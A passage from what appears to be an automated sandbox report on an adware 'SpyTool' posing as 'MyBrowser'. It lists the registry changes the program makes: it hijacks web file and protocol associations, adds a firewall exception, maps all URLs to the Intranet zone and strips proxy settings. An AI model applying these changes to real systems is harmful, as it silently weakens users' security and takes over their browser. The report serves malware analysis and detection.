"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 8D AF 0F C0 DD 39 8B 3B DB 81 6D C6 39 6E 22"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process taskkill.exe:1804 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 F8 C8 72 6A 25 58 C6 C0 8F A1 13 D7 16 61 AA"
The process taskkill.exe:1796 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 D2 47 99 A6 BE 5B C6 2A 0F 83 FC 0D 7D D8 6E"
The process taskkill.exe:660 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 B4 A2 3A CD 9C 79 85 F5 4C 7A C2 53 AF 62 AF"
The process nsj32.tmp:1912 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 43 2C 21 8C AA B9 EA 22 03 73 D7 00 54 68 6A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process amisid.exe:1952 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 B4 85 DD 3A 06 FC 76 57 37 D8 DE EC 17 9D BE"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "D6A6947B24975DB6AB9DE8B171C5FA6E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process amisid.exe:1844 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "D6A6947B24975DB6AB9DE8B171C5FA6E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 70 41 37 6D B5 5B 0E 16 ED CD 4B 19 D6 0A 8F"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process tasklist.exe:1852 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 86 10 6C E8 E8 1C CB 75 0E AA 8A ED E5 C5 08"
The process tasklist.exe:324 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 62 09 4B 75 71 D3 E6 0C 9A 6F 10 23 5F 83 60"
The process nss12.tmp:1616 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D E8 0D 1D AA C7 C4 9E 43 52 4E 38 8C CA 58 22"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 9823.exe:320 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3554]
"setup.exe" = "MyBrowser Installer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 AE 92 EF 52 90 2A 66 AF CE CF BB 2C DA 49 26"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsx36.tmp:1468 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "iml"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
